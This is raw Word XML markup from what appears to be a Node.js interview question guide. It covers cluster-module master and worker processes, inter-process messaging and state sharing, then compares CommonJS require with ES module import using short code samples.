    <w:p w14:paraId="37D990D8" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Master Process:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manages the lifecycle of worker processes. It forks workers, monitors their status, and respawns them if they die.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30968383" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Worker Processes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> These are the actual instances of the application that handle incoming requests. Workers share the same port but run in separate processes, each capable of handling requests independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194018A7"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t>5. How do you handle communication between master and worker processes in Node.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE6CE6" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>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cluster module allows for inter-process communication (IPC) between the master and worker processes. Workers can send messages to the master using process.send(), and the master can listen to these messages using the message event. Similarly, the master can send messages to workers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF37020"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Worker process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39217E13"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process.send({ msg: 'Hello Master' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EE81E2"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CF992EB"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Master process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8616B6"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worker.on('message', (msg) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C22400C"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console.log(`Worker said: ${msg}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FFF6FB" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF"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EB2E73A"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t>6. What are the limitations of Node.js clustering?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605D996C" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D3C018" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shared State:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each worker runs in its own memory space, so you can’t directly share state between workers. A shared database or external caching mechanism (like Redis) is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D15DD" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="190"/>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 xml:space="preserve"> Node.js clustering relies on the operating system for load balancing, which is simple but might not be as sophisticated as external load balancers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC7B27" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Process Overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spawning multiple processes can increase memory usage and system overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CD7D08"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t>7. How can you manage state across clustered Node.js processes?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B426B08" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>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Since each worker has its own memory, state cannot be shared directly. To manage state across workers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E10E48D" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use a shared database (like MongoDB or PostgreSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491CDC79" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implement external caching with Redis or Memcached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7342F355" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use message queues like RabbitMQ or Kafka for managing distributed tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7DFADD"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lastRenderedPageBreak/>
        <w:t>8. How do you monitor and manage clustered Node.js applications in production?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0DDB34" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>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Monitoring tools like PM2, StrongLoop, or custom logging solutions can be used to monitor worker processes, track performance, and manage scaling. These tools provide features like process management, load balancing, automatic restarts, and clustering out of the box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749F61CF"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t>9. What is the difference between clustering and load balancing in Node.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21782F39" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB85C46" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="193"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clustering:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Runs multiple instances of the same Node.js process on different CPU cores within the same machine. Clustering is achieved within the application using the cluster module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB8B69B" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="193"/>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 xml:space="preserve"> Distributes incoming traffic across multiple servers or instances, which may involve multiple machines. Load balancing is typically handled by external tools like Nginx, HAProxy, or cloud load balancers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22423599" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10. How does Node.js handle incoming requests in a clustered environment?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610EE787" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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In a clustered environment, the master process listens to incoming requests and distributes them to worker processes. The operating system handles the actual load distribution to workers, usually using a round-robin approach. Workers can process requests independently, allowing for parallel handling of multiple requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA5818" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762ADB79"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45" w:name="_Toc178383228"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q43. What are the differences between the "require" and "import" statements in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="0E46A696" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js, both require and import statements are used to include and use modules in your application, but they belong to different module systems and have some key differences. Here’s a comparison of require and import:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47717633"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1. Module Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D054B9" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>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 Part of the CommonJS module system, which has been the standard module system in Node.js for a long time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614F2103" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>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 Part of the ECMAScript Modules (ESM) system, which is the standard for JavaScript modules in modern JavaScript and is now supported in Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B247D5"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2. Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597A84C1" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC9DDAB"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6A49DCF5"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const myModule = require('./myModule');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE9C2A" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C160A6"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import fs from 'fs';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5AB28"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import myModule from './myModule';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A3D1E9"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3. Dynamic vs. Static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B889D8" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>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 Can be used dynamically, meaning you can conditionally load modules at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF6B7B4"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if (condition) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F2587E"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myModule = require('./myModule');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A39CD63"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0D99550" w14:textId="59AFA59A" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>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 Static, meaning imports are hoisted and must be at the top level of the file. You cannot conditionally import modules within blocks or functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5641D416" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import myModule from './myModule';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36722869"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4. Loading Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54850482" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>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 Modules are loaded synchronously. This means that Node.js waits for the module to be fully loaded before proceeding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0ACA31" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>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 Modules are loaded asynchronously in the background. This is because import is based on the ECMAScript module system, which is designed to support asynchronous loading of modules in the browser and server environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB80E8"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5. File Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218D2C95" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>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 Can automatically resolve .js, .json, .node file extensions. For example, require('./myModule') will load myModule.js, myModule.json, or myModule.node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF423F9" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>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 Requires the file extension to be explicitly specified or for the module to be registered with the appropriate file type. This is stricter in ESM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1414EB1D"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6. Named vs. Default Exports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018C8158" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>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 Exports are usually accessed as properties on the imported module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD41295"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myModule.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9A34A"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module.exports = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495A1A76"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foo: 'bar',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B5ECC6"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myFunction: () =&gt; {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E491B7A"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5B01653"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5F55437E"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main.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650B34B4"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const { foo, myFunction } = require('./myModule');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F1C7DC" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>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 Supports both named and default imports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA74C5"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myModule.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBE66C9"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export const foo = 'bar';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1279EFDC"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export default function myFunction() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF37F4B"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A675F2D"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main.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB0FCD"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import myFunction, { foo } from './myModule';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4559E5C4"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7. Compatibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D0762F" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>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 Supported in all versions of Node.js and can be used in any module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C52A4B7" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>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 As of Node.js 12 and above, the import statement is supported, but requires the use of .mjs file extensions or specific configuration in package.json ("type": "module") to use ESM syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3985F0CC"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8. Transpilation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6273A6BC" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>require</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Directly supported by Node.js without any need for additional tooling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D07854" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>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 If using import syntax in a Node.js environment that does not fully support ESM, you might need tools like Babel to transpile the code to CommonJS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA4F5ED"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9. Module Cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7B3C8B" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>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 Modules are cached after the first time they are loaded, which can help with performance as subsequent require calls retrieve the module from the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECE8A37" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>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 Also supports caching; however, since the module resolution and loading is asynchronous, the handling is slightly different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54996B7F"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Example of Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBDC95F" w14:textId="77777777" w:rsidR="00BF0CD5" w:rsidRPr="00DA2F32" w:rsidRDefault="00BF0CD5" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Using require:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C166731"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commonjs-module.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6281AA20"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module.exports = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236879F9"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greet: function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1C11F5"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'Hello, World!';</w:t>
      </w:r>
    </w:p>
